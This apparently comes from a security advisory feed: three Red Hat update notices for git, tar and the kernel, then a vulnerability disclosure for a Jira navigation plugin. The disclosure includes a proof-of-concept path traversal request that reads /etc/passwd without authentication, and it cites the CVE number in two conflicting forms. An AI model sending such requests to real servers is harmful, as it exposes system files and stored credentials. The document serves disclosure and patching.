Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: gitattributes parsing integer overflow (CVE-2022-23521)

* git: Heap overflow in `git archive`, `git log --format` leading to RCE  
(CVE-2022-41903)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2162055 - CVE-2022-23521 git: gitattributes parsing integer overflow  
2162056 - CVE-2022-41903 git: Heap overflow in `git archive`, `git log --format` leading to RCE

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm

ppc64:  
git-1.8.3.1-24.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64.rpm

ppc64le:  
git-1.8.3.1-24.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64le.rpm

s390x:  
git-1.8.3.1-24.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-24.el7_9.s390x.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

ppc64:  
git-daemon-1.8.3.1-24.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.ppc64.rpm  
git-svn-1.8.3.1-24.el7_9.ppc64.rpm

ppc64le:  
git-daemon-1.8.3.1-24.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64le.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.ppc64le.rpm  
git-svn-1.8.3.1-24.el7_9.ppc64le.rpm

s390x:  
git-daemon-1.8.3.1-24.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-24.el7_9.s390x.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.s390x.rpm  
git-svn-1.8.3.1-24.el7_9.s390x.rpm

x86_64:  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3ztdzjgjWX9erEAQgw4g//fI6hgVC3Ds7f4CigbDHZ3G6uJVNLgZCo  
ePiMQ7yQ7QB4UHxl7tUlPxA57z+SdAnSWYXMxE/Q38b8asujPfn+RC/nfRYuDkjy  
03Wl5Jw2x7ctlcab+cX3s/qZ77u4HlUF3Hv0bTdMOF6U3CjLzU7kywPVzWzGid4o  
nDKE+NjehScG/UL6ZzkvaKQr7UQk8Uak7gpoCtMsiTWFkAxA9y3xbzBdnNL77PMK  
tYpIvbGCdP/NgIGvOi2iCTIbKQf+mza6EBJUWMzjstR766icUdzb0NSel9V3tP0s  
w25oR17hCUnkSXy3b/eWFccuodGahO4p/DBxVFfOwVk16q0BkAqm9r8TGqijuNhp  
EDsIfJzHDanCqQEUjjWiwxPNmgUtk6/kqp1A8Vrz0O0OaiTQrWw0LHbwosAj5t1+  
Q5bA9F0iBsBqjxEchrUo5fOPtTV7KNjN5KHA8KQACgXZ+QaT5oCLcOGoxyJzLizO  
eYENky+YuqJbBMo71DsJXMK8ovCqRYKzFI6w3zW9As0imZK72O0jtJYkxeV7E2uw  
N16NG92J3vgn0sq2zb08uxhQY/6YFNd2RDPZB+i4Vx40jZu95gfVNihpD/O9b2dZ  
AUtORmrxTGmgQvR4/0kyuEAW3p94BxA0M0fS7NmH9qfq2HU8tJLoh09t2kM3dX5/  
7Pkb0u+dNFE=  
=sL46  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0978-01

Red Hat Security Advisory 2023-0959-01 - The GNU tar program can save multiple files in an archive and restore files from an archive. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: tar security update  
Advisory ID:       RHSA-2023:0959-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0959  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-48303   
=====================================================================

1. Summary:

An update for tar is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The GNU tar program can save multiple files in an archive and restore files  
from an archive.

Security Fix(es):

* tar: heap buffer overflow at from_header() in list.c via specially  
crafted checksum (CVE-2022-48303)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2149722 - CVE-2022-48303 tar: heap buffer overflow at from_header() in list.c via specially crafted checksum

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
tar-1.34-6.el9_1.src.rpm

aarch64:  
tar-1.34-6.el9_1.aarch64.rpm  
tar-debuginfo-1.34-6.el9_1.aarch64.rpm  
tar-debugsource-1.34-6.el9_1.aarch64.rpm

ppc64le:  
tar-1.34-6.el9_1.ppc64le.rpm  
tar-debuginfo-1.34-6.el9_1.ppc64le.rpm  
tar-debugsource-1.34-6.el9_1.ppc64le.rpm

s390x:  
tar-1.34-6.el9_1.s390x.rpm  
tar-debuginfo-1.34-6.el9_1.s390x.rpm  
tar-debugsource-1.34-6.el9_1.s390x.rpm

x86_64:  
tar-1.34-6.el9_1.x86_64.rpm  
tar-debuginfo-1.34-6.el9_1.x86_64.rpm  
tar-debugsource-1.34-6.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zr9zjgjWX9erEAQgFCQ//alfcFGj94ZyrA/2mgvlCz9Cx3lJtojvl  
P1Stw3/AW7q7wMoQ94RDVBKfknI1rU0hwQtrsJ0c8z9hBhoMld1AoaQkaQvlg30E  
ifinlww6QW27/27MZ61+9OIqTvpI8S4II/QN3VNlEgghm3REM0Kkg2m0hdOVE0NM  
+wnjffllagS03wMl25+iOsFU6wXGfXOvPdQb/PtoMuXjdP+Nm54cCUe1vlBI0Sjw  
QribodKXmeymcn9aCgV/uUEZfcS7zy+Iv1UIIBsgvC10TrkXWYnZK+ttqljIiMhs  
IRMpKtY8MpcFNw5RXOk5CnAjY79D3sp85068IudDiq3dl3VHQKG1cJGJodXqz60p  
oT91felsjMoOFa9ey1CE8wEqAjWLVSQWZpZs3QZ+WRZ8GERv8OWA8TCY14L9iwuh  
3Jd7BxdBNQhhS5IJpDIDO1qPP8jeC5AD91CVRofG5RYLT7nsjrHhNnPBtgtl+1Vn  
kGsBKwPAoQMW5Lg8YWB+Ucfc8OEeCrHGFgUTrmHdRHxvvbVw+11Mctg3lDYmwAgr  
KGgCmxt5UVt30iOQioTUDUdoKLKZBvqiiOeeFdh7z/juz6ErecHGT40LKDkcFJmY  
V7QgOQw90htZfuKn53QTb/eatT2biH5THvwxs4SEXtjqkNrUySaMzOO8XE0qaMG7  
t6zN1bJxMiU=  
=ISNA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0959-01

Red Hat Security Advisory 2023-0944-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:0944-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0944  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.71.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zrdzjgjWX9erEAQiWkQ//d8OoWO+BV0oKuhGiTvH7W/uP29aDTHe+  
iMd8yztBdHqZ4kpxI8Ro4nF64BYcnGhhY2fOQ54qPiqSyhooqz7QWrSzwdFvEPzX  
UeQCOtOj6Z3RBhfiyd1a8JLeK0hasCHJL6kR2Onipqpzvi7D2ihjFcy8censOxtp  
roi3FPBJzlC/PmmKgwFdDjFe2G9ZbiZ7plTIkjgzkFGpWah1An/OG0/rBmIDsUpf  
65bZZ6H7jyp8jUg8TCwfONxnJx7wlfev/ixZb/9ZPxkqqYq+mLhCLf3OLnSo0rNZ  
CUAQtbanYKT9x5fUU72diVG3h5pe1LD+8sG7se8pWNSHp3leaN5MB+Jdt5f0MTAn  
EJ4uI5ABEdoLeqbprNedtB8ngLhmNBrd8056T1oXEQDUDLjSJeYJpIbWZkpIG2WU  
1qjsEG5GssicaNx3NMf6Q528UwTpGbhKxHVfY35mqCbmGxWoMZC+5cjtPZQkHkEQ  
Qnp40RMP5bRGOlfbMeIb8vi7lrfvna1JsWm697zGJWD+CA9d02Td+kW58BITyfVc  
weJ8YOgvrgPq+61rNU/2yEoXoSdUlvJ0ajl+JYhod4RVpNZcEMK/lqu6QYejHNc2  
BlIN2OvZo3gVoslDDZq06NFd94p9spubcGXgWMN1zjNcqAV4wgjpnvzdjqj2cQTq  
JFTz9qAr0JE=  
=E5Jd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0944-01

An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.

**Overview**

“**_Stagil navigation for jira – Menù & Themes_**" is a Jira GUI customization plugin that allows, among other things, to insert a custom image as a header and/or footer. This plugin was developed by Stagil, an independent company that is a Silver Solution Partner and focuses on designing efficient and durable plugin solutions for the Jira environment.

**Vulnerability Description**

Prior to version 2.0.52 of the “_Stagil navigation for jira – Menù & Themes_", the _fileName_ parameter is vulnerable to a "_Directory Traversal_" that would allow an attacker to read files on the server knowing their path.

Directory Traversal is a vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application data, credentials for back-end systems, and sensitive operating system files.

The CVE Program has assigned the ID CVE-2023-20256 to this issue. This is a record on the CVE List, which standardizes names for security problems:

**CVE ID: CVE-2023-26256** --> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26256

**Impacts**

This vulnerability allows files on the server to be read. It is also possible to retrieve configuration files containing plaintext passwords, as well as application logs to conduct analysis on users browsing the site.

**CVE-2023-26256 - Directory Traversal****Proof of concept (POC)****Reproducing Steps**

First you need to have the “_Stagil navigation for jira – Menù & Themes v2.0.50”_ plugin installed, which can be downloaded from the atlassian marketplace.

You can check your "_Menù & Themes_" version in admin panel:

Once you have customized the Jira GUI and added a new image as the navigation bar background, you can exploit the vulnerability in question.

Once the image has been loaded whenever you navigate a project menu, an HTTP GET request is made that invokes that image.

This request use two paramenters: “_fileName_” and “_fileMime_”, the former being vulnerable to Path Traversal since no type of check is done on the content of this parameter.

In fact, it is possible to insert a payload, consisting of the path we want to retrieve, inside "_fileName_" to get the contents of the retrieved file as the following images show:

    GET /plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime  HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: image/avif,image/webp,*/*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Sec-Fetch-Dest: image
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Site: same-origin
    
    

Moreover, this request can be made even without being authenticated, in fact in the next evidence the request is made without session cookies:

**Suggestions**

To make the fix for this vulnerability, it is recommended to update the plugin to version 2.0.52 where this issue is no longer present.

**Discovered by****Alessandro Fondacci of Cybertech S.p.A.**

Tag

#linux